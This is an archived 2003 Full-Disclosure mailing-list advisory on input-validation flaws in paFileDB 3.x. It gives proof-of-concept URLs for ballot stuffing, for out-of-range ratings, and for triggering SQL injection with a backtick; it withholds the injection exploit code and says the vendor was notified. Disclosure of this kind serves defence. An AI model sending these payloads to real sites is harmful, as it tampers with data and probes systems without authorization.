[Full-Disclosure] paFileDB 3.x SQL Injection Vulnerability

From: flur (flur@flurnet.org)
Date: 03/24/03

    To: full-disclosure@lists.netsys.com
    From: flur <flur@flurnet.org>
    Date: Mon, 24 Mar 2003 10:57:56 -0500
    

    Flurnet Security
    ----------------
    paFileDB by todd@phparena.net
    PHP Arena http://www.phparena.net

    Tested on:
             paFileDB 3.0 Final
             paFileDB 3.0 Beta 3.1
             paFileDB 3.1 Final

    Explanation:

    paFileDB is a file management script that supports user file rating. It
    uses an SQL database backend. Multiple vulnerabilities exist due to the
    lack of checked input variables. The following exploits exist:
      - Modified 'id' tag allows users to submit unlimited ratings.
      - Hand-edited 'rating' tag allows users to submit ratings above 10 or
    below 0.
      - Both tags do not check for escape characters and will allow SQL injection.

    Proof-Of-Concept Exploits:

    http://target/pafiledb/pafiledb.php?action=rate&id=1[RANDOM]&rate=dorate&rating=10
    Replace [RANDOM] with a random short string and the script will not stop
    you from voting as many times as you like.

    http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=1000
    Submits a file rating of 1000 out of 10, driving the rating up. Conversely,
    -1000 would have the opposite effect, driving the rating down.

    http://target/pafiledb/pafiledb.php?action=rate&id=1&rate=dorate&rating=`
    http://target/pafiledb/pafiledb.php?action=rate&id=`&rate=dorate&rating=10
    SQL Injection vulnerability (exploit code not included)

    Script authors have been notified.

    ____________________ __ _
    ~FluRDoInG flur@flurnet.org
                                 http://www.flurnet.org
    KEY ID 0x8C2C37C4 (pgp.mit.edu) RSA-CAST 2048/2048
    1876 B762 F909 91EB 0C02 C06B 83FF E6C5 8C2C 37C4

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html

